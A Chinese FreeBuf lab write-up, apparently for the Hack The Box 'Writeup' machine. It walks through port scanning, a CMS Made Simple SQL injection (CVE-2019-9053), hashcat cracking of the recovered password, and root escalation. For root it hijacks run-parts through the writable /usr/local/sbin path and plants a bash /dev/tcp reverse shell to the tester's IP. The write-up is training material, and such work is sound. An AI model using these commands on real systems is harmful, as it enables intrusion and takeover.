freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课
报告 专辑
行业服务
政 府
CNCERT CNNVD
会员体系(甲方) 会员体系(厂商) 产品名录 企业空间
知识大陆

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

[Meachines] [Easy] Writeup CMS Made Simple SQLI+Staff组路径劫持权限提升
  • 关注
[Meachines] [Easy] Writeup CMS Made Simple SQLI+Staff组路径劫持权限提升
2025-01-19 16:29:58
所属地 海外

Information Gathering

IP AddressOpening Ports
10.10.10.138TCP:22,80

$ ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.138 | grep '^[0-9]' | cut -d '/' -f1 | tr '\n' ',' | sed s/,$//); nmap -p$ports -sC -sV 10.10.10.138

PORT   STATE  SERVICE VERSION
22/tcp open   ssh     OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey: 
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp closed http
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

CMS Made Simple SQLI ; CVE-2019-9053

image-1.png

$ feroxbuster --url http://10.10.10.138

image.png

image-2.png

$ whatweb http://10.10.10.138/writeup/index.php -v

image-3.png

image-4.png

$ python2 exp -u http://10.10.10.138/writeup

image-5.png

Username:jkr
Email:jkr@writeup.htb
Hash:62def4866937f08cc13bab43bb14e6f7
Salt:5a599ef579066807

$ echo '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807'>hash

$ hashcat -m 20 -a 0 hash /usr/share/wordlists/rockyou.txt

image-6.png

username:jkr
passwword:raykayjay9

$ ssh jkr@10.10.10.138

User.txt

8c05eec57b840468d15218b7a938f180

Privilege Escalation : Staff Group Path Hijackin

image-7.png

staff 组:允许用户在无需 root 权限的情况下对系统(/usr/local)进行本地修改(请注意,/usr/local/bin 中的可执行文件会包含在所有用户的 PATH 变量中,它们可能会“覆盖” /bin 和 /usr/bin 中同名的可执行文件)。
可对比 adm 组,它更多与监控/安全相关。

监控ROOT用户启动/usr/local/目录中哪个程序

$ wget http://10.10.16.6/pspy32

$ ssh jkr@10.10.10.138

image-8.png

使用 run-parts 执行 /etc/update-motd.d 目录下的脚本。
输出结果被保存到 /run/motd.dynamic.new,作为登录时看到的动态信息。

image-9.png

无法保存脚本到update-motd.d 目录下

由于环境变量/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin依次向右寻找。
结合当前用户可修改/usr/local/bin,/usr/local/sbin,/usr/local/games;我们需要先一步劫持run-parts;/usr/local/sbin

$ echo -e '#!/bin/bash\n\n/bin/bash >& /dev/tcp/10.10.16.6/10011 0>&1' > /usr/local/sbin/run-parts; chmod +x /usr/local/sbin/run-parts

$ ssh jkr@10.10.10.138

image-10.png

Root.txt

803d6f00a18d18dcbd03d8e5abf70eb9

# web安全
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录
User.txt
    Root.txt